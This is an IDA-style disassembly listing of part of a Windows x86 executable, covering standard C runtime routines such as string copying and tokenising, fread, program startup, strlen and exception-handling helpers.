arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz loc_4039AF
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_40393C
shr ecx, 2
jnz loc_4039BF
jmp short loc_403963
; ---------------------------------------------------------------------------
loc_40393C: ; CODE XREF: sub_403910+1F�j
; sub_403910+45�j
mov al, [esi]
add esi, 1
mov [edi], al
add edi, 1
sub ecx, 1
jz short loc_403976
test al, al
jz short loc_40397E
test esi, 3
jnz short loc_40393C
mov ebx, ecx
shr ecx, 2
jnz short loc_4039BF
loc_40395E: ; CODE XREF: sub_403910+AD�j
and ebx, 3
jz short loc_403976
loc_403963: ; CODE XREF: sub_403910+2A�j
; sub_403910+64�j
mov al, [esi]
add esi, 1
mov [edi], al
add edi, 1
test al, al
jz short loc_4039A8
sub ebx, 1
jnz short loc_403963
loc_403976: ; CODE XREF: sub_403910+39�j
; sub_403910+51�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_40397E: ; CODE XREF: sub_403910+3D�j
test edi, 3
jz short loc_40399C
loc_403986: ; CODE XREF: sub_403910+8A�j
mov [edi], al
add edi, 1
sub ecx, 1
jz loc_403A2C
test edi, 3
jnz short loc_403986
loc_40399C: ; CODE XREF: sub_403910+74�j
mov ebx, ecx
shr ecx, 2
jnz short loc_403A17
loc_4039A3: ; CODE XREF: sub_403910+9B�j
; sub_403910+116�j
mov [edi], al
add edi, 1
loc_4039A8: ; CODE XREF: sub_403910+5F�j
sub ebx, 1
jnz short loc_4039A3
pop ebx
pop esi
loc_4039AF: ; CODE XREF: sub_403910+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4039B5: ; CODE XREF: sub_403910+C7�j
; sub_403910+DF�j
mov [edi], edx
add edi, 4
sub ecx, 1
jz short loc_40395E
loc_4039BF: ; CODE XREF: sub_403910+24�j
; sub_403910+4C�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_4039B5
test dl, dl
jz short loc_403A09
test dh, dh
jz short loc_4039FF
test edx, 0FF0000h
jz short loc_4039F5
test edx, 0FF000000h
jnz short loc_4039B5
mov [edi], edx
jmp short loc_403A0D
; ---------------------------------------------------------------------------
loc_4039F5: ; CODE XREF: sub_403910+D7�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_403A0D
; ---------------------------------------------------------------------------
loc_4039FF: ; CODE XREF: sub_403910+CF�j
and edx, 0FFh
mov [edi], edx
jmp short loc_403A0D
; ---------------------------------------------------------------------------
loc_403A09: ; CODE XREF: sub_403910+CB�j
xor edx, edx
mov [edi], edx
loc_403A0D: ; CODE XREF: sub_403910+E3�j
; sub_403910+ED�j ...
add edi, 4
xor eax, eax
sub ecx, 1
jz short loc_403A23
loc_403A17: ; CODE XREF: sub_403910+91�j
xor eax, eax
loc_403A19: ; CODE XREF: sub_403910+111�j
mov [edi], eax
add edi, 4
sub ecx, 1
jnz short loc_403A19
loc_403A23: ; CODE XREF: sub_403910+105�j
and ebx, 3
jnz loc_4039A3
loc_403A2C: ; CODE XREF: sub_403910+7E�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_403910 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403A34 proc near ; CODE XREF: sub_417676+1D�p
; sub_417676+5A�p ...
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
mov [ebp+var_2C], eax
call sub_40539D
push 8
pop ecx
mov [ebp+var_28], eax
xor eax, eax
lea edi, [ebp+var_24]
push 7
rep stosd
pop edi
loc_403A65: ; CODE XREF: sub_403A34+4A�j
mov dl, [esi]
movzx ecx, dl
mov eax, ecx
and ecx, edi
mov bl, 1
shl bl, cl
shr eax, 3
lea eax, [ebp+eax+var_24]
or [eax], bl
inc esi
test dl, dl
jnz short loc_403A65
mov edx, [ebp+var_2C]
test edx, edx
jnz short loc_403A94
mov eax, [ebp+var_28]
mov edx, [eax+18h]
jmp short loc_403A94
; ---------------------------------------------------------------------------
loc_403A8F: ; CODE XREF: sub_403A34+77�j
test al, al
jz short loc_403AAD
inc edx
loc_403A94: ; CODE XREF: sub_403A34+51�j
; sub_403A34+59�j
mov al, [edx]
movzx esi, al
xor ebx, ebx
mov ecx, esi
and ecx, edi
inc ebx
shl ebx, cl
shr esi, 3
mov cl, [ebp+esi+var_24]
test bl, cl
jnz short loc_403A8F
loc_403AAD: ; CODE XREF: sub_403A34+5D�j
mov ebx, edx
jmp short loc_403AC9
; ---------------------------------------------------------------------------
loc_403AB1: ; CODE XREF: sub_403A34+98�j
movzx esi, byte ptr [edx]
xor eax, eax
mov ecx, esi
and ecx, edi
inc eax
shl eax, cl
shr esi, 3
mov cl, [ebp+esi+var_24]
test al, cl
jnz short loc_403AD0
inc edx
loc_403AC9: ; CODE XREF: sub_403A34+7B�j
cmp byte ptr [edx], 0
jnz short loc_403AB1
jmp short loc_403AD4
; ---------------------------------------------------------------------------
loc_403AD0: ; CODE XREF: sub_403A34+92�j
mov byte ptr [edx], 0
inc edx
loc_403AD4: ; CODE XREF: sub_403A34+9A�j
mov eax, [ebp+var_28]
mov ecx, [ebp+var_4]
mov [eax+18h], edx
mov eax, ebx
sub eax, edx
neg eax
sbb eax, eax
pop edi
and eax, ebx
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_403A34 endp
; =============== S U B R O U T I N E =======================================
sub_403AF3 proc near ; CODE XREF: sub_41B3D0+70�p
; sub_41B3D0+160�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
xor esi, esi
cmp eax, esi
jnz short loc_403B1A
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_403B1A: ; CODE XREF: sub_403AF3+9�j
mov eax, [eax+0Ch]
and eax, 10h
pop esi
retn
sub_403AF3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403B22 proc near ; CODE XREF: sub_403CB8+A1�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
test edi, edi
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
jz loc_403C72
cmp [ebp+arg_C], 0
jz loc_403C72
imul edi, [ebp+arg_C]
mov esi, [ebp+arg_10]
test word ptr [esi+0Ch], 10Ch
mov [ebp+var_10], edi
mov ebx, edi
jz short loc_403B68
mov eax, [esi+18h]
mov [ebp+var_C], eax
jmp short loc_403B6F
; ---------------------------------------------------------------------------
loc_403B68: ; CODE XREF: sub_403B22+3C�j
mov [ebp+var_C], 1000h
loc_403B6F: ; CODE XREF: sub_403B22+44�j
test edi, edi
jz loc_403C3E
loc_403B77: ; CODE XREF: sub_403B22+116�j
test word ptr [esi+0Ch], 10Ch
jz short loc_403BC0
mov eax, [esi+4]
test eax, eax
jz short loc_403BC0
jl loc_403CA3
cmp ebx, eax
mov edi, ebx
jb short loc_403B94
mov edi, eax
loc_403B94: ; CODE XREF: sub_403B22+6E�j
cmp edi, [ebp+var_4]
ja loc_403C43
push edi
push dword ptr [esi]
push [ebp+var_4]
push [ebp+var_8]
call sub_402F72
sub [esi+4], edi
add [esi], edi
add [ebp+var_8], edi
sub ebx, edi
add esp, 10h
sub [ebp+var_4], edi
mov edi, [ebp+var_10]
jmp short loc_403C36
; ---------------------------------------------------------------------------
loc_403BC0: ; CODE XREF: sub_403B22+5B�j
; sub_403B22+62�j
cmp ebx, [ebp+var_C]
jb short loc_403C0E
cmp [ebp+var_C], 0
mov eax, ebx
jz short loc_403BD6
xor edx, edx
div [ebp+var_C]
mov eax, ebx
sub eax, edx
loc_403BD6: ; CODE XREF: sub_403B22+A9�j
cmp eax, [ebp+var_4]
ja loc_403C79
push eax
push [ebp+var_8]
push esi
call sub_408A20
pop ecx
push eax
call sub_40A34F
add esp, 0Ch
test eax, eax
jz loc_403CB2
cmp eax, 0FFFFFFFFh
jz loc_403CA3
add [ebp+var_8], eax
sub ebx, eax
sub [ebp+var_4], eax
jmp short loc_403C36
; ---------------------------------------------------------------------------
loc_403C0E: ; CODE XREF: sub_403B22+A1�j
push esi
call sub_409C8D
cmp eax, 0FFFFFFFFh
pop ecx
jz loc_403CA7
cmp [ebp+var_4], 0
jz short loc_403C79
mov ecx, [ebp+var_8]
inc [ebp+var_8]
mov [ecx], al
mov eax, [esi+18h]
dec ebx
dec [ebp+var_4]
mov [ebp+var_C], eax
loc_403C36: ; CODE XREF: sub_403B22+9C�j
; sub_403B22+EA�j
test ebx, ebx
jnz loc_403B77
loc_403C3E: ; CODE XREF: sub_403B22+4F�j
mov eax, [ebp+arg_C]
jmp short loc_403C74
; ---------------------------------------------------------------------------
loc_403C43: ; CODE XREF: sub_403B22+75�j
xor esi, esi
cmp [ebp+arg_4], 0FFFFFFFFh
jz short loc_403C5A
push [ebp+arg_4]
push esi
push [ebp+arg_0]
call sub_407B70
add esp, 0Ch
loc_403C5A: ; CODE XREF: sub_403B22+127�j
call sub_4057D3
push esi
push esi
push esi
push esi
mov dword ptr [eax], 22h
push esi
loc_403C6A: ; CODE XREF: sub_403B22+17F�j
call sub_402F39
add esp, 14h
loc_403C72: ; CODE XREF: sub_403B22+1A�j
; sub_403B22+24�j
xor eax, eax
loc_403C74: ; CODE XREF: sub_403B22+11F�j
; sub_403B22+18E�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_403C79: ; CODE XREF: sub_403B22+B7�j
; sub_403B22+100�j
cmp [ebp+arg_4], 0FFFFFFFFh
jz short loc_403C8F
push [ebp+arg_4]
push 0
push [ebp+arg_0]
call sub_407B70
add esp, 0Ch
loc_403C8F: ; CODE XREF: sub_403B22+15B�j
call sub_4057D3
mov dword ptr [eax], 22h
xor eax, eax
push eax
push eax
push eax
push eax
push eax
jmp short loc_403C6A
; ---------------------------------------------------------------------------
loc_403CA3: ; CODE XREF: sub_403B22+64�j
; sub_403B22+DC�j
or dword ptr [esi+0Ch], 20h
loc_403CA7: ; CODE XREF: sub_403B22+F6�j
; sub_403B22+194�j
mov eax, edi
sub eax, ebx
xor edx, edx
div [ebp+arg_8]
jmp short loc_403C74
; ---------------------------------------------------------------------------
loc_403CB2: ; CODE XREF: sub_403B22+D3�j
or dword ptr [esi+0Ch], 10h
jmp short loc_403CA7
sub_403B22 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403CB8 proc near ; CODE XREF: sub_403D7F+12�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push 0Ch
push 74AE43h
call __SEH_prolog4
xor esi, esi
mov [ebp+var_1C], esi
mov ebx, [ebp+arg_8]
cmp ebx, esi
jz short loc_403CFB
mov edi, [ebp+arg_C]
cmp edi, esi
jz short loc_403CFB
xor eax, eax
cmp [ebp+arg_0], esi
setnz al
cmp eax, esi
jnz short loc_403D03
loc_403CE3: ; CODE XREF: sub_403CB8+7A�j
; sub_403CB8+88�j
call sub_4057D3
mov dword ptr [eax], 16h
push esi
push esi
push esi
push esi
push esi
call sub_402F39
add esp, 14h
loc_403CFB: ; CODE XREF: sub_403CB8+16�j
; sub_403CB8+1D�j
xor eax, eax
loc_403CFD: ; CODE XREF: sub_403CB8+BB�j
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_403D03: ; CODE XREF: sub_403CB8+29�j
cmp [ebp+arg_10], esi
jz short loc_403D13
or eax, 0FFFFFFFFh
xor edx, edx
div ebx
cmp edi, eax
jbe short loc_403D42
loc_403D13: ; CODE XREF: sub_403CB8+4E�j
cmp [ebp+arg_4], 0FFFFFFFFh
jz short loc_403D28
push [ebp+arg_4]
push esi
push [ebp+arg_0]
call sub_407B70
add esp, 0Ch
loc_403D28: ; CODE XREF: sub_403CB8+5F�j
xor eax, eax
cmp [ebp+arg_10], esi
setnz al
cmp eax, esi
jz short loc_403CE3
or eax, 0FFFFFFFFh
xor edx, edx
div ebx
cmp eax, edi
sbb eax, eax
inc eax
jz short loc_403CE3
loc_403D42: ; CODE XREF: sub_403CB8+59�j
push [ebp+arg_10]
call sub_40815B
pop ecx
mov [ebp+ms_exc.disabled], esi
push [ebp+arg_10]
push edi
push ebx
push [ebp+arg_4]
push [ebp+arg_0]
call sub_403B22
add esp, 14h
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_403D75
mov eax, [ebp+var_1C]
jmp short loc_403CFD
sub_403CB8 endp
; =============== S U B R O U T I N E =======================================
sub_403D75 proc near ; CODE XREF: sub_403CB8+B3�p
; DATA XREF: J8@F_7_S:00421400�o
push dword ptr [ebp+18h]
call sub_4081AD
pop ecx
retn
sub_403D75 endp
; =============== S U B R O U T I N E =======================================
sub_403D7F proc near ; CODE XREF: sub_41B3D0+D6�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push [esp+arg_C]
push [esp+4+arg_8]
push [esp+8+arg_4]
push 0FFFFFFFFh
push [esp+10h+arg_0]
call sub_403CB8
add esp, 14h
retn
sub_403D7F endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403DA0 proc near ; CODE XREF: sub_41A9DE+59E�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = qword ptr 4
cmp ds:dword_433C78, 0
jz sub_40A6EF
sub esp, 8
stmxcsr [esp+8+var_4]
mov eax, [esp+8+var_4]
and eax, 1F80h
cmp eax, 1F80h
jnz short loc_403DD4
fnstcw word ptr [esp+8+var_8]
mov ax, word ptr [esp+8+var_8]
and ax, 7Fh
cmp ax, 7Fh
loc_403DD4: ; CODE XREF: sub_403DA0+23�j
lea esp, [esp+8]
jnz sub_40A6EF
jmp short $+2
movq xmm0, [esp+arg_0]
movapd xmm2, oword ptr ds:oword_41D3A0
movapd xmm1, xmm0
movapd xmm7, xmm0
psrlq xmm0, 34h
movd eax, xmm0
andpd xmm0, oword ptr ds:oword_41D3C0
psubd xmm2, xmm0
psrlq xmm1, xmm2
test eax, 800h
jz short loc_403E62
cmp eax, 0BFFh
jl short loc_403E9A
psllq xmm1, xmm2
cmp eax, 0C32h
jg short loc_403E33
movq [esp+arg_0], xmm1
fld [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_403E33: ; CODE XREF: sub_403DA0+86�j
; sub_403DA0+E1�j
ucomisd xmm7, xmm7
jnp short loc_403E5D
mov edx, 3ECh
sub esp, 10h
mov [esp+10h+var_4], edx
mov edx, esp
add edx, 14h
mov [esp+10h+var_8], edx
mov [esp+10h+var_C], edx
mov [esp+10h+var_10], edx
call sub_40A42B
add esp, 10h
loc_403E5D: ; CODE XREF: sub_403DA0+97�j
fld [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_403E62: ; CODE XREF: sub_403DA0+74�j
movq xmm0, [esp+arg_0]
psllq xmm1, xmm2
movapd xmm3, xmm0
cmppd xmm0, xmm1, 6
cmp eax, 3FFh
jl short loc_403EA1
cmp eax, 432h
jg short loc_403E33
andpd xmm0, oword ptr ds:oword_41D390
addsd xmm1, xmm0
movq [esp+arg_0], xmm1
fld [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_403E9A: ; CODE XREF: sub_403DA0+7B�j
fld ds:dbl_41D3D0
retn
; ---------------------------------------------------------------------------
loc_403EA1: ; CODE XREF: sub_403DA0+DA�j
cmppd xmm3, oword ptr ds:oword_41D3B0, 6
andpd xmm3, oword ptr ds:oword_41D390
movq [esp+arg_0], xmm3
fld [esp+arg_0]
retn
sub_403DA0 endp
; =============== S U B R O U T I N E =======================================
sub_403EBD proc near ; CODE XREF: sub_403ECE�j
; sub_4102B0+35�p
arg_0 = dword ptr 4
push 0Ah
push 0
push [esp+8+arg_0]
call sub_40A9EB
add esp, 0Ch
retn
sub_403EBD endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403ECE proc near ; CODE XREF: sub_401F1C+11C�p
; sub_401F1C+128�p ...
jmp sub_403EBD
sub_403ECE endp
; =============== S U B R O U T I N E =======================================
sub_403ED3 proc near ; CODE XREF: J8@F_7_S:00403F78�p
; J8@F_7_S:00404015�p ...
arg_0 = dword ptr 4
cmp ds:dword_425A9C, 1
jnz short loc_403EE1
call sub_409C54
loc_403EE1: ; CODE XREF: sub_403ED3+7�j
push [esp+arg_0]
call sub_409AB4
push 0FFh
call sub_4078A7
pop ecx
pop ecx
retn
sub_403ED3 endp
; =============== S U B R O U T I N E =======================================
sub_403EF7 proc near ; CODE XREF: J8@F_7_S:00403FFD�p
cmp word ptr ds:400000h, 5A4Dh
jnz short loc_403F35
mov eax, ds:40003Ch
cmp dword ptr [eax+400000h], 4550h
jnz short loc_403F35
cmp word ptr [eax+400018h], 10Bh
jnz short loc_403F35
cmp dword ptr [eax+400074h], 0Eh
jbe short loc_403F35
xor ecx, ecx
cmp [eax+4000E8h], ecx
setnz cl
mov eax, ecx
retn
; ---------------------------------------------------------------------------
loc_403F35: ; CODE XREF: sub_403EF7+9�j
; sub_403EF7+1A�j ...
xor eax, eax
retn
sub_403EF7 endp
; ---------------------------------------------------------------------------
loc_403F38: ; CODE XREF: J8@F_7_S:0040411D�j
push 60h
push offset dword_421408
call __SEH_prolog4
and dword ptr [ebp-4], 0
lea eax, [ebp-70h]
push eax
call ds:dword_41D1A8
mov dword ptr [ebp-4], 0FFFFFFFEh
mov edi, 94h
push edi
push 0
mov ebx, ds:dword_41D100
call ebx
push eax
call ds:dword_41D114
mov esi, eax
test esi, esi
jnz short loc_403F83
push 12h
call sub_403ED3
pop ecx
jmp loc_40410D
; ---------------------------------------------------------------------------
loc_403F83: ; CODE XREF: J8@F_7_S:00403F74�j
mov [esi], edi
push esi
call ds:dword_41D068
push esi
push 0
test eax, eax
jnz short loc_403FA1
call ebx
push eax
call ds:dword_41D10C
jmp loc_40410D
; ---------------------------------------------------------------------------
loc_403FA1: ; CODE XREF: J8@F_7_S:00403F91�j
mov eax, [esi+10h]
mov [ebp-20h], eax
mov eax, [esi+4]
mov [ebp-24h], eax
mov eax, [esi+8]
mov [ebp-28h], eax
mov edi, [esi+0Ch]
and edi, 7FFFh
call ebx
push eax
call ds:dword_41D10C
mov esi, [ebp-20h]
cmp esi, 2
jz short loc_403FD3
or edi, 8000h
loc_403FD3: ; CODE XREF: J8@F_7_S:00403FCB�j
mov ecx, [ebp-24h]
mov eax, ecx
shl eax, 8
mov edx, [ebp-28h]
add eax, edx
mov ds:dword_425F78, esi
mov ds:dword_425F80, eax
mov ds:dword_425F84, ecx
mov ds:dword_425F88, edx
mov ds:dword_425F7C, edi
call sub_403EF7
mov [ebp-20h], eax
xor ebx, ebx
inc ebx
push ebx
call sub_405A83
pop ecx
test eax, eax
jnz short loc_40401B
push 1Ch
call sub_403ED3
pop ecx
loc_40401B: ; CODE XREF: J8@F_7_S:00404011�j
call sub_4054D6
test eax, eax
jnz short loc_40402C
push 10h
call sub_403ED3
pop ecx
loc_40402C: ; CODE XREF: J8@F_7_S:00404022�j
call sub_40B042
mov [ebp-4], ebx
call sub_4087E0
test eax, eax
jge short loc_404045
push 1Bh
call sub_40785D
pop ecx
loc_404045: ; CODE XREF: J8@F_7_S:0040403B�j
call ds:dword_41D1A4
mov ds:dword_434DF8, eax
call sub_40AF0D
mov ds:dword_425A94, eax
call sub_40AE54
test eax, eax
jge short loc_40406B
push 8
call sub_40785D
pop ecx
loc_40406B: ; CODE XREF: J8@F_7_S:00404061�j
call sub_40ABE1
test eax, eax
jge short loc_40407C
push 9
call sub_40785D
pop ecx
loc_40407C: ; CODE XREF: J8@F_7_S:00404072�j
push ebx
call sub_407979
pop ecx
test eax, eax
jz short loc_40408E
push eax
call sub_40785D
pop ecx
loc_40408E: ; CODE XREF: J8@F_7_S:00404085�j
call sub_40AB84
test [ebp-44h], bl
jz short loc_40409E
movzx ecx, word ptr [ebp-40h]
jmp short loc_4040A1
; ---------------------------------------------------------------------------
loc_40409E: ; CODE XREF: J8@F_7_S:00404096�j
push 0Ah
pop ecx
loc_4040A1: ; CODE XREF: J8@F_7_S:0040409C�j
push ecx
push eax
push 0
push 400000h
call loc_41BBE3
mov [ebp-1Ch], eax
cmp dword ptr [ebp-20h], 0
jnz short loc_4040BE
push eax
call sub_407AD9
loc_4040BE: ; CODE XREF: J8@F_7_S:004040B6�j
call sub_407AFB
jmp short loc_4040F3
; ---------------------------------------------------------------------------
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-2Ch], ecx
push eax
push ecx
call sub_40AA15
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
mov eax, [ebp-2Ch]
mov [ebp-1Ch], eax
cmp dword ptr [ebp-20h], 0
jnz short loc_4040EE
push eax
call sub_407AEA
loc_4040EE: ; CODE XREF: J8@F_7_S:004040E6�j
call sub_407B0A
loc_4040F3: ; CODE XREF: J8@F_7_S:004040C3�j
mov dword ptr [ebp-4], 0FFFFFFFEh
mov eax, [ebp-1Ch]
jmp short loc_404112
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
mov dword ptr [ebp-4], 0FFFFFFFEh
loc_40410D: ; CODE XREF: J8@F_7_S:00403F7E�j
; J8@F_7_S:00403F9C�j
mov eax, 0FFh
loc_404112: ; CODE XREF: J8@F_7_S:004040FD�j
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
call sub_40B08A
jmp loc_403F38
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404130 proc near ; CODE XREF: sub_402C0C+16�p
; sub_402C72+21�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_404160
loc_40413C: ; CODE XREF: sub_404130+1B�j
mov al, [ecx]
add ecx, 1
test al, al
jz short loc_404193
test ecx, 3
jnz short loc_40413C
add eax, 0
lea esp, [esp+0]
lea esp, [esp+0]
loc_404160: ; CODE XREF: sub_404130+A�j
; sub_404130+46�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_404160
mov eax, [ecx-4]
test al, al
jz short loc_4041B1
test ah, ah
jz short loc_4041A7
test eax, 0FF0000h
jz short loc_40419D
test eax, 0FF000000h
jz short loc_404193
jmp short loc_404160
; ---------------------------------------------------------------------------
loc_404193: ; CODE XREF: sub_404130+13�j
; sub_404130+5F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_40419D: ; CODE XREF: sub_404130+58�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_4041A7: ; CODE XREF: sub_404130+51�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_4041B1: ; CODE XREF: sub_404130+4D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_404130 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4041BB proc near ; CODE XREF: sub_40121E+58�p
; sub_40150F+F�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
push edi
push 8
pop ecx
mov esi, offset dword_41D3D8
lea edi, [ebp+var_20]
rep movsd
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
test eax, eax
pop edi
mov [ebp+var_4], eax
pop esi
jz short loc_4041EE
test byte ptr [eax], 8
jz short loc_4041EE
mov [ebp+var_C], 1994000h
loc_4041EE: ; CODE XREF: sub_4041BB+25�j
; sub_4041BB+2A�j
lea eax, [ebp+var_C]
push eax
push [ebp+var_10]
push [ebp+var_1C]
push [ebp+var_20]
call ds:dword_41D1AC
leave
retn 8
sub_4041BB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404205 proc near ; CODE XREF: sub_40B8A9+65�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov ebx, large fs:0
mov eax, [ebx]
mov large fs:0, eax
mov eax, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov ebp, [ebp+var_4]
mov esp, [ebx-4]
jmp eax
sub_404205 endp
; ---------------------------------------------------------------------------
pop ebx
leave
retn 8
; =============== S U B R O U T I N E =======================================
sub_404235 proc near ; CODE XREF: sub_40B3C2+31�p
; sub_40B818+59�p ...
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_404235 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40423C proc near ; CODE XREF: sub_4043C9+69�p
; sub_40B8A9:loc_40B8D1�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
mov esi, large fs:0
mov [ebp+var_4], esi
mov [ebp+var_8], offset loc_404265
push 0
push [ebp+arg_4]
push [ebp+var_8]
push [ebp+arg_0]
call sub_413976
loc_404265: ; DATA XREF: sub_40423C+12�o
mov eax, [ebp+arg_4]
mov eax, [eax+4]
and eax, 0FFFFFFFDh
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
mov edi, large fs:0
mov ebx, [ebp+var_4]
mov [ebx], edi
mov large fs:0, ebx
pop edi
pop esi
pop ebx
leave
retn 8
sub_40423C endp
; ---------------------------------------------------------------------------
loc_40428E: ; CODE XREF: J8@F_7_S:0041C1E9�j
; J8@F_7_S:0041C204�j ...
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
cld
mov [ebp-4], eax
xor eax, eax
push eax
push eax
push eax
push dword ptr [ebp-4]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_40BD75
add esp, 20h
mov [ebp-8], eax
pop edi
pop esi
pop ebx
mov eax, [ebp-8]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4042C4: ; DATA XREF: sub_40456E+24�o
push esi
cld
mov esi, [esp+0Ch]
mov ecx, [esi+8]
xor ecx, esi
call sub_402710
push 0
push esi
push dword ptr [esi+14h]
push dword ptr [esi+0Ch]
push 0
push dword ptr [esp+24h]
push dword ptr [esi+10h]
push dword ptr [esp+24h]
call sub_40BD75
add esp, 20h
pop esi
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4042F4 proc near ; CODE XREF: sub_4043C9+81�p
; sub_40B915+53�p
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 38h
push ebx
cmp [ebp+arg_0], 123h
jnz short loc_404316
mov eax, offset loc_40439D
mov ecx, [ebp+arg_4]
mov [ecx], eax
xor eax, eax
inc eax
jmp loc_4043C6
; ---------------------------------------------------------------------------
loc_404316: ; CODE XREF: sub_4042F4+E�j
and [ebp+var_28], 0
mov [ebp+var_24], offset sub_4043C9
mov eax, ds:dword_423064
lea ecx, [ebp+var_28]
xor eax, ecx
mov [ebp+var_20], eax
mov eax, [ebp+arg_10]
mov [ebp+var_1C], eax
mov eax, [ebp+arg_4]
mov [ebp+var_18], eax
mov eax, [ebp+arg_14]
mov [ebp+var_14], eax
mov eax, [ebp+arg_18]
mov [ebp+var_10], eax
and [ebp+var_C], 0
and [ebp+var_8], 0
